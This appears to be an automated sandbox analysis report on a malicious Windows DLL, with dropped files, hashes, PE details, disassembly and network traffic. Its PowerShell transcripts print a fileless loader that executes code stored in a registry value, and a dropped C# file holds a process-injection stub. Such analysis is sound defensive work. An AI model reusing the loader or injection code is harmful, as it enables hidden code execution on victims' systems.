Entropy (8bit):	5.022568322197063
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJwQ5mMRSR7a1yTyShSRa+rVSSRnA/fh14v02JKy:V/DTLDfuqRySQ9rV5nA/TDy
MD5:	9B2165E59D51BB6E8E99190BD9C6BC8B
SHA1:	02B2F188D7654CA079ADA726994D383CF75FF114
SHA-256:	36E14435EE02B02C2B06087FF3750569342E8B8D8571F3F45E61AF50D3B03CEA
SHA-512:	20E05DE0D57D1F6F53FB3290CB1C533D152C6076E2451B0A463D5AD6342976F49F31DDA8CC668E3EC26775E75EE191B8DD44645F40F723667EE8376C84998209
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tseeoxqndt. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr jphxxkfdthf,IntPtr lnf,IntPtr uet);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint wwqqeyldba,uint ccghpcxllqj,IntPtr tobsn);.. }..}.

C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.201022431539453
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fFKaPBUKqzxs7+AEszIN723fFKaPBUKP:p37Lvkmb6K2avGWZETavb
MD5:	DC98CC23B95599397E769464B09DC377
SHA1:	AB59B15E500048CCCDF5B16A12180FBACF483812
SHA-256:	FF3CDCE91FE877A22B97E6D39F977F1B6CD1B393946DE710898F68F7BB50786A
SHA-512:	B1CB39A820FE404EB7483F00FE95B8B71D01387A18C9545F4A7D9E681AC062F021B52CB5CE2E545EB3F01239CEE12F89CCA4EF9CF667A177F14490392B60E59D
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.0.cs"

C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6342516870507025
Encrypted:	false
SSDEEP:	24:etGS9DO8+mDR853RY0JGC4lp2tkZfjGlDZ0hEdI+ycuZhNpakS3PNnq:6ymS5+vjJjQZ6Ed1ulpa3lq
MD5:	C905890CA8CFB80D2C531CFDAC5E713A
SHA1:	86F037603834718110FE1E72440615959060E976
SHA-256:	A2BA52C59DEB7D24A365BFC4E77269153887A738513A8F4FF5AB27177CFD400D
SHA-512:	C19A3F559BB75538334835509EF8A8EB7EF4D07F444B84A3BD3E9304C50E0E300C2DC249B43E952B2AB7F58E3D0ECEB069AB90F181F9C47466EE8EF8EC753B20
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.&`...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....z.....~.....................h. ...h...!.h.%...h............3.8.....=.......J.......].......................................&........<Module>.lojdfmf3.dll.tseeoxqndt.W32.mscorl

C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF3C5248E8E1772FD2.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40233
Entropy (8bit):	0.6822755747974047
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+xvdc/KmwfnFB/lmwfnFB/WmwfnFB/L:kBqoxKAuqR+xvdc/KhFBthFB+hFBT
MD5:	C9C5C175E802A0D6F1E0C5E5906A5FF6
SHA1:	693865203FA1BCAB27968851C17576349A2B5F0B
SHA-256:	8AD08C75A7EEEFC1771076D7B3BA4B1B494FCE12FB00886F7FC5CCB6B17FF75A
SHA-512:	12AF404E2C2AC518E30246A843F9D4B21BC4CB4CED9F266599A8AF13E718C6FA69E2EE500C956EAE3D2AD8A6D39C6E152F3C9B6EA55A65593D1C5FE4E606F305
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF495D779FEA4AFC6F.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40177
Entropy (8bit):	0.6742783969129265
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+PxzaBsXONnwfXONnwUXONnwB:kBqoxKAuqR+PxzaBsrfrUrB
MD5:	A5F265C9B6BA39A3FF1A5EC846EEB0AF
SHA1:	2CAF36C185676354094F621F696217C74B66B6AC
SHA-256:	C43E113FE27DA85AA80ED6138354DD07300E207702403352B7393A0F0AE6A499
SHA-512:	3B53B5BEE1D69818C901611E839652D782FC14A955B6A37FF92B2D258AFA5DCB3515DB5F31CA438245937301749EC1CD847E181ACECA8F938E7E6261AC0F6813
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6146159DCCFE94CE.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	14053
Entropy (8bit):	1.0040145985918831
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo19loV9lWF5GbGeEUGENZN3JNvACaAtqNqoUNqXu98cvD:kBqoI+gbEFHow4h0V
MD5:	B9E3B407A143BD9D030FBA71D8CDEEF9
SHA1:	EC464DD6028B35F0D066921DBFC0092B71655A20
SHA-256:	AD4FC74B503275290CAD7E9774BA1DE913C45CA777473F4723364ACDDC884217
SHA-512:	18507D6D37E1741351B4F50F955FAAF8BEE4EE2A8EB182044C08F0F11AE810EEF1B76434C38694A0B68808B8A3C4536A6BD9E7D20D359E5B4CD6B98840D11D25
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF94A0433F3C84B120.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4091594567051621
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo89loM9lWd1Z1GM:kBqoIHhqM
MD5:	8F70E076E767472D58FA0BAB1943AE8B
SHA1:	9242BBE0F739D57118753BF62D9DEA016FED6B98
SHA-256:	0385F848A616652BE97DD2DCA9C23F73AE0E575E3087FA29FC51F0A5E0D9831A
SHA-512:	613CFCF86CF90B2D3C6AA8C58B191D265302B77C41E983118B48DACF34B9D0CC976DA394AC5183636AAB5E2D826596884CCC4E097D6DE8AE5AB528BE3B897F62
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9862F95666CE8E46.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40057
Entropy (8bit):	0.6521501398241716
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+IOEV+zgw/Zmgw/Zxgw/ZS:kBqoxKAuqR+IOEV+zgAZmgAZxgAZS
MD5:	A44315621735D76F4A9EE148112024AE
SHA1:	FABE6B326E79B440797AB3B06E40DA476013CD73
SHA-256:	D4CEB04D6087240A44713B063CBDB6C1645668B13BF95829803DE9DF8F1C2A86
SHA-512:	A5151CAD1B50F94EF2EA2EB14EC47C91E62FD0C49FFC058AF6ABF4818E96BC0EBC5BE75E88A3F6738B30020EE0A8D366322FD24E1A298050CF0D2DFBC46112D1
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD55014E88807743E.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40089
Entropy (8bit):	0.6582713340786801
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+sKQx6HPeJ3ZbPeJ3ZEPeJ3Zh:kBqoxKAuqR+sKQx6HPepZbPepZEPepZh
MD5:	E4074464061BDB66B25F038DB97FC839
SHA1:	1682C80041A6F2079DFFF28B8F51C63171BB6B36
SHA-256:	6207F2534A8ED9B70FF5CB28F7B395F89D32BA537919FCF965E1659F94F7D8E0
SHA-512:	A14E7AD936199F86918155FE5DFCB7E95C5CCEB2BBBAEBE25C95F323BF7F430BAD1159D5E5C265894157174EDF9A612E14CF6A0D18DEDEEAA57458322BA32FEE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD9D7AEF5A86C726A.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40193
Entropy (8bit):	0.6778685965074567
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+npLCJsy+Uyy5y+Uyyey+Uyyb:kBqoxKAuqR+npLCJsdUR5dURedURb
MD5:	73C4478B61FC7B16225786AC8CC4D3A1
SHA1:	0D71495DDD8A5ABC770389B66E1C979269E48154
SHA-256:	EF505AFFCCB6DB2CC18352F17DA33DE3AB006E5742281671508E67EF626A5B9A
SHA-512:	A8159C3C035008F30BC7CFDAB0FBF80EA8E2EFF745B967A495C755F24B0C6B7391C2DFFF57209BEE3137934952C32621C255D45293996A11F64519393E8B6FF4
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE8DB2A113C1213D8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40233
Entropy (8bit):	0.6853940857753099
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+fBjKRI2CCDzegx2CCDzeg62CCDzegP:kBqoxKAuqR+fBjKRIaz9azOazD
MD5:	4DE3B642626A58CAB9F13DC5CB6F8EA4
SHA1:	E5A1A1F4578A885298585328F7DFCBCEE0A069C7
SHA-256:	66A9FCB5C29CF62287CE123725B31F79E4F098B949CFAEEEFD4F54F0F438B95F
SHA-512:	D224911C042B01DBEB9D3A277E5F93C293E61D2E7C56D15289FD1A23A3E1CFF3A98B849E730434E915040F268199BE673335807643520B65A31D181A7437C5DD
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\20210212\PowerShell_transcript.783875.Nasw0dJs.20210212100056.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1195
Entropy (8bit):	5.293710866010518
Encrypted:	false
SSDEEP:	24:BxSAJr7vBVLRcZx2DOXUWOLCHGIYBtLWlyHjeTKKjX4CIym1ZJXx5OLCHGIYBtAn:BZJ/vTLqoORF/lyqDYB1ZTbFDeZZ1o
MD5:	917D34CAB50B14F45334DE97A49DC437
SHA1:	0D13996A1BD48ACA689F01883A4D20945DDCA32B
SHA-256:	5418ECB1D3FC3D228021DBD4E34DA88698F2B0576FA54A1B04A1FD5C2E188CFA
SHA-512:	04528B28F355EFAF6312587303E62B3E518C9E1832FE724EF56558BD07CD0671EE6B82AB7105A6B6CD56E2EAA6D0508403B615A577A297FF1F7D1E7F22FBC1ED
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210212100057..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 6200..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210212100057..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..****************

C:\Users\user\Documents\20210212\PowerShell_transcript.783875.jBDxpBMk.20210212100054.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1195
Entropy (8bit):	5.294819722185012
Encrypted:	false
SSDEEP:	24:BxSAJDy7vBVLRcZx2DOXUWOLCHGIYBtLWIdHjeTKKjX4CIym1ZJXxAOLCHGIYBtU:BZJuvTLqoORF/IdqDYB1ZTIFD5ZZ1l
MD5:	CC443B88DD807732AC5078405FA7DA18
SHA1:	21AC7C4644AD0EB0DE090EDC9CE4C96E0B81A1FA
SHA-256:	BDBB036283F5CDFDC9E672E3025B81141EF08011CBA5138A61C42C31032CDA87
SHA-512:	B4A604133A9182B0EA24225E6351C01CD51E55441C1723791A35AFD3B517CA50054BC21F28D347F7441EE95F68AAC4469D7BCDD23FB54ED14F9C4920519337FE
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210212100054..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 3548..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210212100054..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..****************

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.717684753804391
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	u8xtCk7fq8.dll
File size:	95744
MD5:	913c77883aa2e28ec98e5cf86d6fc2cb
SHA1:	5a5c60b32770cb4654269a812d07e13767ad7ed6
SHA256:	ae55975bd40147ab3b9a02f1e2e0279f714bce9845d26ace252cd590a42d733d
SHA512:	8722b1958bdea7c23073d4f26c8f47221244ff44d243d253948a48d3635b5c96131078cb867e3f83f6cfdb4800c26ca4da9b4c12ce56219591b5c716ba058bf9
SSDEEP:	1536:Hp8F8N2PU39eB+thp5sgHp6qeIyHCsousUotPPlByJbo3:Hp8RPUt73pjQ+YoHtPtB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!.........d.......D....... .............................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x100044c0
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x60191212 [Tue Feb 2 08:49:22 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d271f7a9f51a46084a356053f9d55873

Entrypoint Preview

Instruction
push ebx
push ebp
mov ebp, esp
add esp, FFFFFFF4h
push ebp
mov dword ptr [esp], FFFF0000h
call 00007FE1F8A91C14h
push ebp
mov dword ptr [esp], 00000220h
push ebp
add dword ptr [esp], 00001210h
sub dword ptr [esp], ebp
call 00007FE1F8A938F4h
push ecx
mov ecx, eax
or ecx, eax
mov eax, ecx
pop ecx
jne 00007FE1F8A94F28h
pushad
push ecx
and ecx, 00000000h
xor ecx, dword ptr [ebx+00412440h]
and eax, 00000000h
or eax, ecx
pop ecx
push edi
mov dword ptr [esp], 00000040h
push ebx
mov dword ptr [esp], 00001000h
mov dword ptr [ebp-0Ch], 00000000h
push dword ptr [ebp-0Ch]
add dword ptr [esp], eax
push 00000000h
call dword ptr [ebx+00413630h]
push eax
pop dword ptr [ebp-08h]
push dword ptr [ebp-08h]
pop edi
push edi
pop dword ptr [ebp-0Ch]
push dword ptr [ebp-0Ch]
pop dword ptr [ebx+00412448h]
cmp ebx, 00000000h
jbe 00007FE1F8A94F24h
push ecx
mov ecx, ebx
push dword ptr [ebx+00412398h]
pop dword ptr [ebp-08h]
add dword ptr [ebp-08h], ecx
push dword ptr [ebp-08h]
pop dword ptr [ebx+00412398h]
pop ecx
push edx
mov edx, ebx
push dword ptr [ebx+00412340h]
pop dword ptr [ebp-08h]
add dword ptr [ebp-08h], edx
push dword ptr [ebp-08h]
pop dword ptr [ebx+00412340h]
pop edx
push dword ptr [ebx+00412398h]
pop dword ptr [ebp-04h]
push dword ptr [ebp-04h]
pop esi
push esi
and esi, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2018000	0xf0	.NewIT
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2013000	0x44b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13600	0xdc	.rdatat
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x10bc6	0x10c00	False	0.777576958955	data	7.17681778951	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdatat	0x12000	0x2000ada	0x1e00	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2013000	0x44b4	0x4600	False	0.334486607143	data	5.19563687955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.NewIT	0x2018000	0x11d	0x200	False	0.302734375	data	2.08522381479	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x20130e8	0x4228	data	English	United States
RT_GROUP_ICON	0x2017310	0x16	data	English	United States
RT_MANIFEST	0x2017328	0x18a	XML 1.0 document, ASCII text	English	United States

Imports

DLL	Import
kernel32.dll	LoadLibraryA, VirtualAlloc, VirtualProtect, GetProcAddress, SignalObjectAndWait, VerLanguageNameA, _llseek, VerLanguageNameW
user32.dll	GetCursorInfo, GetWindowDC, ShowWindow, GetWindowThreadProcessId, SetCursor, GetAsyncKeyState, GetGUIThreadInfo, ReleaseCapture, GetKeyboardType, ShowCursor, CheckRadioButton, ReleaseDC, CheckDlgButton, GetCaretBlinkTime, GetActiveWindow, GetCapture, GetCursorPos, CheckMenuRadioItem, SetFocus, EqualRect
gdiplus.dll	GdipAddPathEllipseI, GdipAddPathBezierI
advapi32.dll	OpenTraceW
gdi32.dll	GdiDeleteSpoolFileHandle
comctl32.dll	FlatSB_GetScrollRange, FlatSB_GetScrollProp, FlatSB_SetScrollRange
msimg32.dll	GradientFill, TransparentBlt, vSetDdrawflag
winspool.drv	AddFormA, AddPortA
oledlg.dll	OleUIAddVerbMenuA
shlwapi.dll	StrCmpCW, StrPBrkA, SHAutoComplete, PathRemoveBackslashA
winspool.drv	DocumentEvent

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2021 09:59:55.875204086 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:55.875255108 CET	49743	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:55.955992937 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:55.956053019 CET	80	49743	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:55.956140041 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:55.956187963 CET	49743	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:55.964468002 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.086561918 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.434792995 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.434823036 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.434843063 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.434866905 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.434901953 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.434925079 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.434957027 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.435014009 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.474822998 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.474850893 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.474867105 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.474884033 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.474972010 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.475028992 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.515726089 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.515750885 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.515772104 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.515788078 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.515788078 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.515809059 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.515815973 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.515829086 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.515870094 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.516427994 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.516449928 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.516465902 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.516484022 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.516510010 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.516510010 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.516531944 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.516535997 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.516556025 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.516598940 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.555891037 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.555927038 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.555947065 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.555964947 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.555979967 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.555996895 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.556006908 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.556021929 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.556031942 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.556054115 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.556070089 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.556096077 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.556127071 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.596590042 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.596637964 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.596679926 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.596720934 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.596725941 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.596782923 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.596796989 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.596828938 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.596851110 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.596868038 CET	80	49742	35.228.31.40	192.168.2.6
Feb 12, 2021 09:59:56.596900940 CET	49742	80	192.168.2.6	35.228.31.40
Feb 12, 2021 09:59:56.596908092 CET	80	49742	35.228.31.40	192.168.2.6
